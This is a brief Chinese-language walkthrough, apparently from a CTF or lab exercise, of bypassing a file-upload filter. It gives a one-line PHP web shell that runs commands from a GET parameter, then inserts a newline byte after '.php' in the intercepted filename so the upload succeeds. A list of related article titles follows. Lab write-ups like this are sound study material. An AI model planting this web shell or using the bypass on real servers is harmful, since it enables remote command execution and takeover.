Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
她说可以呀4 分钟前
网络基础初识Alonse_沃虎电子7 分钟前
沃虎音频变压器:专业音频系统中的关键组件卓应米老师10 分钟前
【网络配置实战】堆叠的配置我在人间贩卖青春10 分钟前
IP地址与端口号heze0916 分钟前
sqli-labs-Less-24Gobysec17 分钟前
Goby 漏洞安全通告|GNU InetUtils Telnetd USER环境变量注入 权限绕过漏洞(CVE-2026-24061)天荒地老笑话么18 分钟前
Linux 里 chmod 755 file.txt 是什么意思(权限配置)一晌小贪欢26 分钟前
Python 健壮性进阶:精通 TCP/IP 网络编程与 requirements.txt 的最佳实践MicroTech202532 分钟前
微算法科技(NASDAQ :MLGO)量子安全区块链:PQ-DPoL与Falcon签名的双重防御体系枷锁—sha34 分钟前
【CTF笔记篇】SQL 注入总结